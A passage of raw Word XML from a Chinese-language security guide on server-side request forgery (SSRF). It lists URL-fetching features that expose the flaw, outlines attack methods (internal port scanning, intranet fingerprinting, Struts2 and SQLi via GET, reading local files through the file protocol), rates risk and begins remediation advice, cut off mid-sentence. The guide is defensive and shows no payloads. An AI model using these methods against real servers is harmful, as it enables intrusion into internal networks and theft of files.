    <w:p w14:paraId="6FD325A6" w14:textId="0C24B19D" w:rsidR="00D70FD0" w:rsidRPr="009910AE" w:rsidRDefault="00D70FD0" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转码服务：通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址把原地址的网页内容调优使其适合手机屏幕浏览：由于手机屏幕大小的关系，直接浏览网页内容的时候会造成许多不便，因此有些公司提供了转码功能，把网页内容通过相关手段转为适合手机屏幕浏览的样式。例如百度、腾讯、搜狗等公司都有提供在线转码服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12585003" w14:textId="390674F5" w:rsidR="00D70FD0" w:rsidRPr="009910AE" w:rsidRDefault="00D70FD0" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在线翻译：通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址翻译对应文本的内容。提供此功能的国内公司有百度、有道等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61023C8F" w14:textId="0BFA6611" w:rsidR="00D70FD0" w:rsidRPr="009910AE" w:rsidRDefault="00D70FD0" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片加载与下载，通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址加载或下载图片：图片加载远程图片地址此功能用到的地方很多，但大多都是比较隐秘，比如在有些公司中的加载自家图片服务器上的图片用于展示。（此处可能会有人有疑问，为什么加载图片服务器上的图片也会有问题，直接使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签不就好了？</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，没错是这样，但是开发者为了有更好的用户体验通常对图片做些微小调整例如加水印、压缩等，所以就可能造成</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDA2001" w14:textId="7FC436E0" w:rsidR="00D70FD0" w:rsidRPr="009910AE" w:rsidRDefault="00D70FD0" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片、文章收藏功能：此处的图片、文章收藏中的文章收藏就类似于功能一、分享功能中获取</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址中</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及文本的内容作为显示，目的还是为了更好的用户体验，而图片收藏就类似于功能四、图片加载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB39ED" w14:textId="3250CCB0" w:rsidR="009145B3" w:rsidRPr="009910AE" w:rsidRDefault="00D70FD0" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未公开的</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现以及其他调用</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的功能：此处类似的功能有</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的网站评分，以及有些网站通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取远程地址</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件来加载内容</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6FDD38" w14:textId="77777777" w:rsidR="00162164" w:rsidRPr="009910AE" w:rsidRDefault="00C24790" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00162164" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果应用程序对用户提供的</w:t>
      </w:r>
      <w:r w:rsidR="00162164" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00162164" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和远端服务器返回的信息没有进行合适的验证和过滤，则可能存在服务器端请求伪造攻击。</w:t>
      </w:r>
      <w:r w:rsidR="00162164" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>服务器端请求伪造攻击</w:t>
      </w:r>
      <w:r w:rsidR="00162164" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景</w:t>
      </w:r>
      <w:r w:rsidR="00162164" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>如下图所示</w:t>
      </w:r>
      <w:r w:rsidR="00162164" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4786998A" w14:textId="77777777" w:rsidR="00162164" w:rsidRPr="009910AE" w:rsidRDefault="00162164" w:rsidP="000B549D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CFA1D44" wp14:editId="5241A2C0">
            <wp:extent cx="5278120" cy="2517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RF攻击流程图.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5278120" cy="2517140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B6BAFE" w14:textId="77777777" w:rsidR="00162164" w:rsidRPr="009910AE" w:rsidRDefault="00162164" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者想要访问主机</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的服务，由于存在防火墙的原因无法直接访问，这时可以借助主机</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来发起服务器端请求伪造攻击，通过主机</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向主机</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起请求，从而完成攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击方式主要有以下</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D305933"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对外网、服务器所在内网、本地进行端口扫描，获取一些服务的</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息（一般包括服务器的类型、版本，服务器上启动的服务信息）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DAB279"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攻击运行在内网或本地的应用程序（比如堆栈溢出）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFDA797"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通过访问默认文件实现对内网</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用的指纹识别；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701351AD"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攻击内外网的</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用，主要是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数就可以实现的攻击（比如</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qli</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BC36DF" w14:textId="1D99E68C" w:rsidR="009145B3"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利用</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议读取本地文件等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3691C8B4" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CD6401" w14:textId="3DC03958" w:rsidR="009145B3" w:rsidRPr="009910AE" w:rsidRDefault="00623532" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：有回显，可探测内网，文件访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1264B3F2" w14:textId="39F6C224" w:rsidR="00623532" w:rsidRPr="009910AE" w:rsidRDefault="00623532" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：无回显，但可访问外网</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FCFDB4" w14:textId="77777777" w:rsidR="005C6098" w:rsidRPr="009910AE" w:rsidRDefault="009145B3" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="005C6098" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常从以下几点来防御服务器端请求伪造攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729DB64F" w14:textId="77777777" w:rsidR="005C6098" w:rsidRPr="009910AE" w:rsidRDefault="005C6098" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤内网服务器对公网服务器请求的响应。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用是获取某一类型的文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在把返回结果展示给用户之前应先验证返回的信息是否符合文件类型标准，比如返回信息应为图片，如果返回信息是</w:t>
      </w:r>
